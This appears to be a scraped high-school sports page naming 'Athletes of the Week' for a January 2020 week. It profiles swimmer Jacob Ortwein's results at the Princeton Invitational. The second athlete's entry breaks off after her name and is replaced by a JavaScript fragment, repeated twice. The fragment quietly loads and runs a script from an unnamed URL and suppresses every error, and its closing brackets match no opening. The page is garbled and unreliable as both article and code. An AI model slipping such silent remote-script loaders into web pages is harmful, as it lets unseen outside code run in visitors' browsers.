Athletes of the Week
Kemba Credit Union Athletes of the Week 1/6/2020-1/12/2020
Jacob Ortwein
Senior, Swimming
Jacob led the Firebirds in scoring in Saturday’s 15 team Princeton Invitational swim meet. He had Wests’s two highest individual event finishes taking the silver in both the 200 yard individual medley and the 500 yard free style. He also earned points by scoring in two relay events.
Paige Striley
Sophomore, Swimming
const loadScriptWithTimeout = (url, timeout) => { return new Promise((resolve, reject) => { const script = document.createElement('script'); script.src = url; script.async = true;
script.onload = () => { clearTimeout(timer); resolve(); };
script.onerror = () => { clearTimeout(timer); reject(); };
const timer = setTimeout(() => { script.remove(); reject(); }, timeout);
document.body.appendChild(script); }); };
await loadScriptWithTimeout(scriptUrl, TIMEOUT_MS); } catch (_) {} })();
const loadScriptWithTimeout = (url, timeout) => { return new Promise((resolve, reject) => { const script = document.createElement('script'); script.src = url; script.async = true;
script.onload = () => { clearTimeout(timer); resolve(); };
script.onerror = () => { clearTimeout(timer); reject(); };
const timer = setTimeout(() => { script.remove(); reject(); }, timeout);
document.body.appendChild(script); }); };
await loadScriptWithTimeout(scriptUrl, TIMEOUT_MS); } catch (_) {} })();